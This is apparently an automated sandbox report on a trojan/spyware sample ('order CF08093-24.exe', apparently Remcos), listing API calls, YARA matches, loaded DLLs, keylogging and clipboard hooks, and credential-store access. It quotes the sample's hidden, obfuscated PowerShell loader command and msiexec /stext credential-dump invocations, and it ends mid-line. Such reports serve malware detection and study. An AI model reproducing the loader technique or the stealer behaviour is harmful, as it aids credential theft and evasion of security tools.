              Source: msiexec.exe, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Windows\SysWOW64\msiexec.exe | Windows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exe
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Code function: 0_2_00405705 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard

              E-Banking Fraud

              Source: Yara match | File source: 00000006.00000003.3278532416.0000000007B2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000003.3298978061.0000000007B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000003.3298626109.0000000007B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.4486408121.000000002340F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.4475133406.0000000007B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000003.3275406324.0000000007B2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 5752, type: MEMORYSTR
              Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              System Summary

              Source: initial sample | Static PE information: Filename: order CF08093-24.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes\order CF08093-24.exe
              Source: C:\Windows\SysWOW64\msiexec.exe | Process Stats: CPU usage > 49%
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process Stats: CPU usage > 49%
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00401806 NtdllDefWindowProc_W
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_004018C0 NtdllDefWindowProc_W
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_004016FD NtdllDefWindowProc_A
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_004017B7 NtdllDefWindowProc_A
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00402CAC NtdllDefWindowProc_A
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00402D66 NtdllDefWindowProc_A
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Code function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 004169A7 appears 87 times
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 0044DB70 appears 41 times
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 004165FF appears 35 times
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 00422297 appears 42 times
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 00444B5A appears 37 times
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 00413025 appears 79 times
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 00416760 appears 69 times
              Source: order CF08093-24.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@18/17@1/3
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Code function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Code function: 0_2_004049B1 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Code function: 0_2_004021CF CoCreateInstance
              Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-HSAM04
              Source: C:\Users\user\Desktop\order CF08093-24.exe | File created: C:\Users\user\AppData\Local\Temp\nsvB59B.tmp
              Source: order CF08093-24.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\SysWOW64\msiexec.exe | System information queried: HandleInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
              Source: C:\Users\user\Desktop\order CF08093-24.exe | File read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: msiexec.exe, msiexec.exe, 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: msiexec.exe, 00000006.00000002.4486764970.0000000023A40000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: msiexec.exe, 0000000A.00000003.3297297426.00000000048B1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.3298515325.00000000048BC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: msiexec.exe, msiexec.exe, 0000000A.00000002.3297636694.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: order CF08093-24.exe | ReversingLabs: Detection: 13%
              Source: C:\Users\user\Desktop\order CF08093-24.exe | File read: C:\Users\user\Desktop\order CF08093-24.exe
              Source: C:\Windows\SysWOW64\msiexec.exe | Evasive API call chain: __getmainargs,DecisionNodes,exitgraph_11-33236
              Source: unknown | Process created: C:\Users\user\Desktop\order CF08093-24.exe "C:\Users\user\Desktop\order CF08093-24.exe"
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Amanuensissers25=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Servicerende.Gal55';$Magnoliaceae=$Amanuensissers25.SubString(71792,3);.$Magnoliaceae($Amanuensissers25)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qzuooqprgulbovxttvfxbedksdnhf"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\aczzpbalucdoyblxcfryerxbbswqyinsk"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dwmsp"
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: dwmapi.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: oleacc.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: shfolder.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: riched20.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: usp10.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: msls31.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: textinputframework.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: coreuicomponents.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: coremessaging.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: coremessaging.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: textshaping.dll
              Source: C:\Users\user\Desktop\order CF08093-24.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\order CF08093-24.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: order CF08093-24.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: %]qm.Core.pdb source: powershell.exe, 00000002.00000002.3121960782.00000000083C8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: re.pdb source: powershell.exe, 00000002.00000002.3121960782.00000000083C8000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

Source: Yara match | File source: 00000002.00000002.3123794249.000000000A6AE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Sortkor $Gmelinastrohatch $Wallful), (Caseine @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Tettering = [AppDomain]::CurrentDomain.GetAssemblies()$global
